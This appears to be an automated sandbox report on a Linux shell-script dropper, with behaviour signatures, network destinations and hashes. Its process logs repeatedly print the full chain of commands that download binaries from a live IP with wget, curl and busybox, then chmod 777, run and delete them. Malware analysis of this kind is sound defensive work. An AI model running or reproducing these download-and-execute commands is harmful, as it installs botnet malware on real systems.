Analysis Overview
SHA256
77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb
Threat Level: Shows suspicious behavior
The file 77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 02:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
12s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 89.187.167.7:443 | | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:55
Platform
debian9-armhf-20240611-en
Max time kernel
51s
Max time network
56s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
